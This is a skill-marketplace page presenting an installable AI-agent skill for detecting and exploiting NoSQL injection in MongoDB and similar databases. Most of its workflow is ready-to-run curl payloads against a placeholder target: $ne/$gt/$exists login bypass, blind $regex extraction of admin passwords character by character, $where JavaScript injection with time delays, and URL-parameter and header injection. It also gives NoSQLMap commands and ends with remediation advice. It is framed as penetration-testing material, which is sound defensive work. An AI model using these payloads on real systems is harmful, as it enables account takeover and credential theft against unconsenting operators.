Ejecuta cualquier Skill en Manus
con un clic

Ejecuta cualquier Skill en Manus con un clic

exploiting-nosql-injection-vulnerabilities

Estrellas6

Forks2

Actualizado16 de marzo de 2026, 00:59

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

Instalación

Instalar con Codex o Claude Copia este prompt, pégalo en Codex, Claude u otro asistente, y deja que revise la página de la skill y la instale por ti.

Ejecutar en Manus

Fuente

autohandai

autohandai/community-skills

Abrir repositorio de GitHub Ver repositorios del creador

Descarga

Ejecutar en Manus

Ocupaciones relacionadasSOC

Basado en la clasificación ocupacional SOC

Analistas de seguridad de la informaciónOcupaciones informáticas y matemáticas·SOC 15-1212

Explorador de archivos

8 archivos

SKILL.md

readonly

Más de este repositorio

mismo repositorio

triaging-vulnerabilities-with-ssvc-framework

autohandai/community-skills

Triage and prioritize vulnerabilities using CISA's Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree framework to produce actionable remediation priorities.

2026-03-186

performing-soc-2-type-ii-audit-preparation

autohandai/community-skills

SOC 2 Type II audit preparation involves designing, implementing, and demonstrating the operational effectiveness of controls aligned to the AICPA Trust Services Criteria (TSC) over a defined audit pe

2026-03-186

userinterface-wiki

autohandai/community-skills

UI/UX best practices for web interfaces. Use when reviewing animations, CSS, audio, typography, UX patterns, prefetching, or icon implementations. Covers 11 categories from animation principles to typography. Outputs file:line findings.

2026-03-186

configuring-aws-verified-access-for-ztna

autohandai/community-skills

Configure AWS Verified Access to provide VPN-less zero trust network access to internal applications using identity and device posture verification with Cedar policy language.

2026-03-166

configuring-identity-aware-proxy-with-google-iap

autohandai/community-skills

Configuring Google Cloud Identity-Aware Proxy (IAP) to enforce per-request identity verification for Compute Engine, App Engine, Cloud Run, and GKE services using access levels, context-aware policies, and programmatic access with service accounts.

2026-03-166

configuring-zscaler-private-access-for-ztna

autohandai/community-skills

Configuring Zscaler Private Access (ZPA) to replace traditional VPN with zero trust network access by deploying App Connectors, defining application segments, configuring access policies based on user identity and device posture, and integrating with IdPs.

2026-03-166

name	exploiting-nosql-injection-vulnerabilities
description	Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.
domain	cybersecurity
subdomain	web-application-security
tags	["nosql-injection","mongodb","authentication-bypass","injection-attack","web-security","database-security","api-testing"]
version	1.0
author	mahipal
license	Apache-2.0

Exploiting NoSQL Injection Vulnerabilities

When to Use

During web application penetration testing of applications using NoSQL databases
When testing authentication mechanisms backed by MongoDB or similar databases
When assessing APIs that accept JSON input for database queries
During bug bounty hunting on applications with NoSQL backends
When performing security code review of database query construction

Prerequisites

Burp Suite Professional or Community Edition with JSON support
NoSQLMap tool installed (pip install nosqlmap or from GitHub)
Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
Proxy configured for HTTP traffic interception
Python 3.x for custom payload scripting

Workflow

Step 1 — Identify NoSQL Injection Points

# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'

Step 2 — Perform Authentication Bypass

# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'

Step 3 — Extract Data Using Boolean-Based Blind Injection

# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'

Step 4 — Exploit JavaScript Injection via $where

# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'

Step 5 — Use NoSQLMap for Automated Testing

# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'

Step 6 — Test URL Parameter Injection

# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"

# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"

Key Concepts

Concept	Description
Operator Injection	Injecting MongoDB operators ($ne, $gt, $regex) into query parameters
Authentication Bypass	Using operators to match any document and bypass login checks
Blind Extraction	Character-by-character data extraction using $regex boolean responses
$where Injection	Executing arbitrary JavaScript on the MongoDB server via $where operator
Type Juggling	Exploiting how NoSQL databases handle different input types (string vs object)
BSON Injection	Manipulating Binary JSON serialization in MongoDB wire protocol
Server-Side JS	JavaScript execution context available in MongoDB for query evaluation

Tools & Systems

Tool	Purpose
NoSQLMap	Automated NoSQL injection detection and exploitation framework
Burp Suite	HTTP proxy for intercepting and modifying JSON requests
MongoDB Shell	Direct database interaction for testing query behavior
nosqli	Dedicated NoSQL injection scanner and exploitation tool
PayloadsAllTheThings	Curated NoSQL injection payload repository
Nuclei	Template-based scanner with NoSQL injection detection templates
Postman	API testing platform for crafting NoSQL injection requests

Common Scenarios

Login Bypass — Bypass MongoDB-backed authentication using {"$ne": ""} operator injection in username and password fields
Data Enumeration — Extract database contents character by character using $regex blind injection when no direct output is visible
Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass

Output Format

## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls